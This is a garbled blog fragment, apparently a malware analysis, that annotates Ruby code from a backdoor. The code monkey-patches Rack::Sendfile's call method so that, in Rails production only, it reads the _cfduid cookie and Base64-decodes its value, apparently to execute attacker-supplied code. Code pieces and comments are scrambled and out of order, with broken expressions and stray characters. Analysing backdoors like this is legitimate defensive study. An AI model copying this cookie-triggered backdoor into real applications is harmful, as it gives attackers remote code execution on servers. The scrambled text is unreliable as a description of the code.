![]() ![]() # then it scans/looks for this for this value: _cfduid and extracts it with # a regular expression. to_s ) # Please edit this if you are more knowledgeable: # gets the e value out of there. send ( :define_method, :call ) do | e|īegin x = Base64. # `r.send` makes use of the `Object#send` method # Another way of rewriting the above code would be: # `Rack::Sendfile.alias_method(:c, :call)` which is equivalent to: # `r.send :alias_method, :c, :call` # The following bit of code below bit redefines the call(e) method which is in # the SendFile class: # again, `r.send(:define_method, :call) do |e|` is equivalent to saying: # class Rack::Sendfile # def call(e) # => Insert the malicious code below: # end # end r. # After the above you could now do: # send_file = Rack::Sendfile.new # send_file.c # and the above would in turn call the ORIGINAL `call` method contained in the # Rack::Sendfile class, and not the one that is being monkey patched below. send :alias_method, :c, :call # creates a method on Rack::Sendfile called `c` which reroutes to `call`. ![]() # So whenever you see r, just think we are working with the Rack::Sendfile class. the block parameter, r, will be the Rack::Sendfile class. ![]() production? # Continue only if we're in the rails production environment: Rack:: Sendfile. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |